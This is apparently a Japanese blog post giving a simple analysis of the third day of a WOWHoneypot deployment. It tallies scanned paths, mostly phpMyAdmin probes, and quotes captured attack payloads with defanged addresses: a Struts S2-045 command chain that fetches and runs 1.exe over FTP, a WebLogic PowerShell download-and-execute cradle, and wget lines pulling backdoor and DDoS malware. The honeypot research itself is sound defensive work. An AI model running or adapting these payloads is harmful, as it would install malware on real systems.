WOWHoneypot簡易分析(3日目)
2018/6/6(運用3日目)の簡易分析です。
とりあえず、時間が取れて解析環境構築できるまでは、主にコマンドベースでの分析です。
6/6は計85件のアクセスです。今日はメソッドとパスで集計取りました。
$ awk '{print $1,$5,$6}' access_log | sort | uniq -c | grep "06-06" | sort -nr
33 [2018-06-06 "GET /
4 [2018-06-06 "GET /index.action
2 [2018-06-06 "GET /xampp/phpmyadmin/index.php
2 [2018-06-06 "GET /www/phpMyAdmin/index.php
2 [2018-06-06 "GET /typo3/phpmyadmin/index.php
2 [2018-06-06 "GET /pma-old/index.php
2 [2018-06-06 "GET /PMA/index.php
2 [2018-06-06 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-06 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-06 "GET /phpMyAdminold/index.php
2 [2018-06-06 "GET /phpMyAdmin.old/index.php
2 [2018-06-06 "GET /phpmyadmin-old/index.php
2 [2018-06-06 "GET /phpmyadmin1/index.php
2 [2018-06-06 "GET /phpmyadmin0/index.php
2 [2018-06-06 "GET /phpma/index.php
2 [2018-06-06 "GET /phpadmin/index.php
2 [2018-06-06 "GET /mysqladmin/index.php
2 [2018-06-06 "GET /mysql-admin/index.php
2 [2018-06-06 "GET /myadmin/index.php
2 [2018-06-06 "GET /index.php
2 [2018-06-06 "GET /claroline/phpMyAdmin/index.php
1 [2018-06-06 "PROPFIND /
1 [2018-06-06 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-06 "HEAD /
1 [2018-06-06 "GET /winbox.png
1 [2018-06-06 "GET /pmd/index.php
1 [2018-06-06 "GET /pma/index.php
1 [2018-06-06 "GET /phpMyAdmin/index.php
1 [2018-06-06 "GET /mysql/index.php
1 [2018-06-06 "GET /foltia/
1 [2018-06-06 "GET /epgrec/do-record.sh
MySQLをウェブブラウザで管理するためのツールであるphpMyAdminの存在有無を調査すると思われるが計42件。
index.phpで終わるパスでphpMyaAdminやその略と思われるpma等が含まれるもの、/index.phpで終わっているものをカウントしています。
/index.action のパスにアクセスしている4件は、Apache Struts 2 の脆弱性 S2-045(CVE-2017-5638)を狙ったもの。
Content-Typeに攻撃コードが入るため分かりやすいです。以下が検知したものの任意のコード実行部分。ftpで1.exeを取得して実行するものです。
'echo open 107.179.45[.]135> c:\cmd.txt&echo 110>> c:\cmd.txt&echo 110>> c:\cmd.txt&echo get 1.exe>> c:\cmd.txt&echo bye >> c:\cmd.txt&echo 1.exe>> c:\cmd.txt&ftp -s:c:\cmd.txt&start 1.exe&1.exe&del c:\cmd.txt&exit'
VTやHAで見ても不明のため、そのうち調査したいと思います。
https://www.virustotal.com/#/url/7775d7b0e23b01783553290ab47158dade603bfbe6524b55b579ef1e978e7c07/detection
https://www.hybrid-analysis.com/sample/e682dfcdde010f6e15bae0d843696f6ae8d5a85e75441660b782789ee747f075?environmentId=120
/wls-wsat/配下へのアクセスはWeblogicの脆弱性(CVE-2017-10271)を狙ったもの。昨日と取得先IPだけが変わっています。この内容はハンティング機能で収集できるように設定を入れたいなと思います。
$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL $OS";IEX $WC.DownloadString('hxxp://101.200.45[.]78/images/test/DL.php');
/foltia/のパスへのアクセスはfoltia ANIME LOCKERというLinux向けのアニメ録画用のOSSパッケージのようです。これを使っているかの調査のようです。
/epgrec/do-record.shも同じく録画予約システムのようです。LinuxベースでphpとMySQLを使っているようです。これの存在調査のようです。
こちらは以下のサイトで詳細に調査されていました。
6/6のハンティングログは以下です。
[2018-06-05 12:49:40+0900] 186.205.92[.]89 wget -O nmlt1.sh hxxp://domstates[.]su/nmlt1.sh
[2018-06-06 16:47:32+0900] 123.188.135[.]201 wget -c hxxp://119.188.247[.]73:5858/tatada
[2018-06-06 16:47:32+0900] 123.188.135[.]201 wget -c hxxp://wap.tfddos[.]net:57843/linux
一番上は前日のログにもあり、バックドアマルウェアのようです。
二つ目はLinux向けのDDoS用マルウェアのようです。
https://www.virustotal.com/#/url/c5fd7464cc3a44e57daeaf5ee58d0dff3206802b947b99dcf97b7d5461b53eee/detection
3つ目は不明でした。これも調べてみたいところです。
https://www.virustotal.com/#/url/fac9df70f02c64af7e320e1388418c6bcaa36473c18cbfea6803ba0e620d7b25/detection
以上です。
